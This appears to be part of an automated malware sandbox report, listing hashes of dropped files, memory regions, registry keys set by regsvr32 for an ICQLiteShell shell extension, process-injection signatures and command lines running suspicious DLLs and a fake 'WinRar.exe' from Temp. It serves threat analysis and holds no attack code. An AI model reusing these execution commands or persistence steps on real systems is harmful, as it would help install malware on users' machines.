| SHA512 | 6b3adb92c042654815ecfec1002606d945ba5ac22d665c3da8a67f65bef1150764138fd05aec143e0b90eb54388a4c32671138b94410ebd322016f43c6484c17 |
\Users\Admin\AppData\Local\Temp\7zSAF62.tmp\Install.exe
| MD5 | c63ba82f34d45f3d7ad2e18a124196a4 |
| SHA1 | ed8c1a150924c153d3d761aa12f37f51e24de58c |
| SHA256 | a315c6f9b9286aca8c5cadae0540fd23936dd16f7abdb44fa8c3d844cc34ba52 |
| SHA512 | e5c0e9fa243fc19dc312b462ce0b332b941ab2ef22294e58f80f0ab1432fcea4f7f5951fc56d2be292407486aa6c1558d314689224a99257744d785fe7487827 |
C:\Users\Admin\AppData\Local\Temp\7zSAF62.tmp\Install.exe
| MD5 | 89d5e2d734b5f9220ab9e9bf7079f091 |
| SHA1 | 216293a070ae916eae6f232e952310893d635b9b |
| SHA256 | b45eaaad14405f2e2e15c8453b5270c989a105ad483cfa1719a8e3a4dd1b2f5f |
| SHA512 | 51e6724abfb9c31a5020e18964502dc7e644e6e061b59381c067d76898a9cf0e407d9fefb6a7a05c8aab6f797f759465da04047cb3c3decd9a4ac0dc631c8702 |
C:\Users\Admin\AppData\Local\Temp\7zSAF62.tmp\Install.exe
| MD5 | 8a0be8e996aa546206dcd44c1c57b9dd |
| SHA1 | c29c300d3d3a0a38569bf21bd6c64401fcd2c936 |
| SHA256 | fdf05282ac51d0a75c8b33a67a8e6d59e50e8feb6d8fb7448e94ef27773f41d4 |
| SHA512 | 55ff1870d27a9443d5d65378408f5cadd7d911da25c01d7a6896309ca0645059e3de3713660ab43639ba3fa59b05af2868739d8087750aa2fd01584232393be4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 81eb0b16c26b570fc356500b33300475 |
| SHA1 | 56214b3118ac557c850d3a5a7a776f5d056d8ddf |
| SHA256 | 24b7fd4391aa1b8226df3d398305aa235a9aeba692dcd16cb5593092843c05b5 |
| SHA512 | 37def55add1eb7518160be3db0abb0449173011b9f6014569ab2cd9e34b29ede90b75fa95c6c29c5bfa9164539dd4efacb3bda83468cc4b90be6f4f6e075a097 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 62e842ed2addc50df42e6806271ebfa4 |
| SHA1 | 9c0a7f69c8aa772507b3c2bb4e925d49941b2249 |
| SHA256 | 82463854fd2f1c9aec34a9bef8b66ba43acee339ea2698dc59ee1269a494c992 |
| SHA512 | 64e15347fee1215fcbd40930c1354880c49cc2be26e3c1429a323eb12687e0c7137f3ba00ac00e3de1ef4fd382d9e22a8856647669f2a6fad3f9d144e0d1aedf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | d7925ff4914a433235880790b85716b4 |
| SHA1 | 91a8bcae68b68c150225155296d03b219c98b4ba |
| SHA256 | caaadf0c4f3c7c9b8dbe361d02eeeea234879175eaceac3c52d0d07ee5919134 |
| SHA512 | 0117935bb501b343db3d839b04d6012d0c90a69ae59043bba5ddcf680300c6966c0de4b653589ba0c1edcd59a113af7da0db4ba191e97ba2ca376572da6191fe |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 9da3b5b4a894c15d1aa6d3d5da27ee05 |
| SHA1 | 0d16e87371ab9401b56eb65a272347758566941b |
| SHA256 | 5d3ca1af142868ad96cffad80f8828660ef8fc2de231848cf76bd714ca68e37a |
| SHA512 | 8caa5f7d48de98fe9858cea339f6e08f8ef099a268f5fe644f91e2cf815be613bc59f1b48bff1e7413ecd57d3dc3db57c8cdd1a9987f4b5fd720fd96320a0d37 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 48f59c93a8e1dd709378e62bd87a4db7 |
| SHA1 | 01828fab0ff3af86d2eb60c709f05654d41d3910 |
| SHA256 | b26708b8b8d21141b90c37d4c7173bf4f890873147c46e659c2f387093de950d |
| SHA512 | b6112b32f023479c41554cbde566515fad137aa609e3859e326859b7be9d42fb81b43660ad48f38bfda7fb426f9d4364281d4a83b7f8e4a7e266d41d8b2ea5b1 |
memory/760-899-0x0000000000400000-0x000000000044A000-memory.dmp
memory/760-901-0x0000000000312000-0x0000000000328000-memory.dmp
memory/1740-903-0x0000000000400000-0x0000000000451000-memory.dmp
memory/1740-905-0x00000000002F2000-0x000000000030E000-memory.dmp
memory/760-904-0x00000000001B0000-0x00000000001BB000-memory.dmp
memory/1740-906-0x00000000001B0000-0x00000000001DD000-memory.dmp
memory/1180-898-0x0000000002AC0000-0x0000000002AD6000-memory.dmp
memory/860-907-0x00000000066F0000-0x00000000069CC000-memory.dmp
memory/1140-908-0x0000000006630000-0x00000000068C2000-memory.dmp
memory/1140-909-0x00000000743A0000-0x0000000074A8E000-memory.dmp
memory/1556-910-0x0000000000400000-0x0000000000647000-memory.dmp
memory/1404-911-0x0000000000400000-0x0000000000574000-memory.dmp
memory/2372-912-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/1968-914-0x0000000000400000-0x00000000004BC000-memory.dmp
memory/860-915-0x00000000743A0000-0x0000000074A8E000-memory.dmp
memory/1968-916-0x0000000000240000-0x0000000000241000-memory.dmp
memory/1404-917-0x0000000000710000-0x0000000000712000-memory.dmp
memory/1556-918-0x00000000006F0000-0x00000000007F0000-memory.dmp
memory/1556-919-0x0000000000310000-0x0000000000344000-memory.dmp
memory/2372-920-0x0000000002630000-0x0000000002A28000-memory.dmp
memory/2372-921-0x0000000002A30000-0x000000000331B000-memory.dmp
memory/2076-922-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1140-923-0x0000000005020000-0x0000000005060000-memory.dmp
memory/860-924-0x0000000005100000-0x0000000005140000-memory.dmp
memory/1556-925-0x0000000000400000-0x0000000000647000-memory.dmp
memory/1556-926-0x0000000061E00000-0x0000000061EF3000-memory.dmp
C:\Users\Admin\AppData\Local\0f55cdb1-87bf-468c-92ec-c4a4fe31428a\FFiKfTBiUrpfk88gvzxLozn1.exe
| MD5 | 1486c524e15595f43557781c9348357a |
| SHA1 | a2798d652b5b58101e01a9d8389ff38dab562d8a |
| SHA256 | 07b5ee5502240c16b7d22e750e18d9b7b4d4de4e01075551aee1bc4cc1a381b8 |
| SHA512 | 21762671431e8377b515d9aafbebf5d2089c667d93996ce81bf0cc101ec60bc55b9e1073e0c9386f3e7c66fa6c6fdc161186df1d681329a110f169ff16a632fc |
C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe
| MD5 | 476f501292c7fefc0d9bfbb9acd7573e |
| SHA1 | 5aa9e96613c4004b63042e4eaa0dbf9bed19f427 |
| SHA256 | 16920f1ecd38aa12badc3aa029d8ede71091193597b2921e0659426441e55baa |
| SHA512 | 7de53adaf0191ad16319dacc5af15c1a72ad3d903dd7e5d815bb7b1e7e2151ca93cd9db42833f1026a397d9ad4b6b1beffe47a56e4ccb81aadca614146514b2a |
C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe
| MD5 | ab6a989dd1fb2eda4107b787d217c510 |
| SHA1 | 7158054365e07a3dac7252460bd360c748ceadfb |
| SHA256 | 303420c59eac796de85bb146df38106483d5489f086169d4c4c4bac685b3ca6a |
| SHA512 | 8cf3b665f4566268ad3f5e099bd70f8ad2597c332b1e7df607fcf320e05da655a46079b557f83ca476277358c2a749837764424305401cefb65088c9f97de2de |
memory/648-966-0x0000000000220000-0x00000000002B2000-memory.dmp
memory/2076-964-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
| MD5 | 79ea676a3aee99a2654436d6a81b4bbc |
| SHA1 | 542068caf39724694c92e8e70bf99042e8453b4d |
| SHA256 | 9545f5cccf5ccee6fbb26027bf5ee37a6fa8a16286c45efbbca78d4f78308562 |
| SHA512 | 3b6b90728bfa050721854b3c652d228bfe03c80dd32e9524ff9770e2a0fb5ff3ce9ee3f71bed193e0e35cadd3abd076e36a04ca24b8027446c26f29361f55400 |
memory/1536-977-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
| MD5 | f0f9d085be429ef244dc9699fc48c5c0 |
| SHA1 | f5f0f9ff60a2bc875b47f714e2e27f23b1985143 |
| SHA256 | aaa27d6de7fb2c781ac086b7e5a238f2fa0280637ef8f3f298046ad1e8722bcc |
| SHA512 | 9cefb2d73fc53836eeae6acf77cc5d4444cf61c5101fc2ff6f8f132af0b7c51966009c64c577b2506eed135dad449d32b0d71219b93f4a958203371fd67cc37c |
memory/648-965-0x0000000000220000-0x00000000002B2000-memory.dmp
\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
| MD5 | bdcb50c6f09cbb7d58a02ca0426b7b92 |
| SHA1 | 9ea0589377ebf6e68b2c5ed7b209b2f82fbecac7 |
| SHA256 | 29e3b6bd3fc9d675d22c20453cd0441eb3e0e4e72d3a51a1a96272875d41f84e |
| SHA512 | d92c86b9ba49860ea521f842dcf1b84760e0fc4b596bc8894e2ed64c61a2234d1751ba07672d6c8da0779cd9feba2838679cd774e68d98953da3887101722b8c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a55c3ef94e2a78f25cd58635ab0de102 |
| SHA1 | f3901d0b14f664d446a53395bad8e0c8faa1b943 |
| SHA256 | 98586ebfa1db4fbbc23645ac122ca90a1fa71c9f0eb4596fef4d55fded1103a5 |
| SHA512 | 64c8ada5d471f693a1c328399213791dcd04e25c02ff65a73cf41f5fb3b8577b9f207c7aafa1416e56e9832da25d2a350c9524d76da8bab8c8089591befba466 |
\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
\Users\Admin\Documents\GuardFox\Jhv610CCO7ohTiXzS8CCeWKd.exe
| MD5 | f32230a1dc38cb27b47a11b56adb0969 |
| SHA1 | f3d2dab4676dda7dd6df125ef96967d3778b0726 |
| SHA256 | 92170856ae8fa372d8cb3285781a5ab79fbf88a66fff3bb0817a467d775d2121 |
| SHA512 | a901c1f5bc069e1438da71ab265b91fba678035c56644ce4b601fbdbf9603577df7340a9749c8de8ecd66b48808ccd52e56cfcefd093cd837a5718fb8239f68b |
\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe
| MD5 | 02d733e41073ed0c60d77feb18be917c |
| SHA1 | 82d2f6e857c169fd450122225cab62646cbbfcd4 |
| SHA256 | 3a8ca8d08e0479c1ee3f64eccc7122043dafef90982e2ed5b1fb5e3ffb9a7a18 |
| SHA512 | 6ec507ed101c000625c776e49667e76895666bf3725c9f667f85f71bd0e7678237c64f56101a21f11702b0ebeb465c97e566934d3bd8fd5437cf89e45e7a7e63 |
\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe
| MD5 | b4fbe7dfa4ce056cc07f70c0de57b9b9 |
| SHA1 | a096c94e1636e562c713574e318027b416835332 |
| SHA256 | be1227a0f2c6b52d65ba41b6dedac31a8b967a6ebed535911f8aa9fa98e2e4a5 |
| SHA512 | c7cd9ada61512a7167df244082820f5aac03941694651d589142b4d80e80ffae6d4f039f25f2854da21d03582cc22e8cff0feff744d77db3d94b9f603c2d88dd |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win7-20231215-es
Max time kernel
118s
Max time network
128s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2312 wrote to memory of 2880 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2312 wrote to memory of 2880 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2312 wrote to memory of 2880 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2312 wrote to memory of 2880 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2312 wrote to memory of 2880 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2312 wrote to memory of 2880 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2312 wrote to memory of 2880 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win7-20231215-es
Max time kernel
132s
Max time network
141s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe
"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win10v2004-20231215-es
Max time kernel
142s
Max time network
153s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4932 wrote to memory of 4552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4932 wrote to memory of 4552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4932 wrote to memory of 4552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
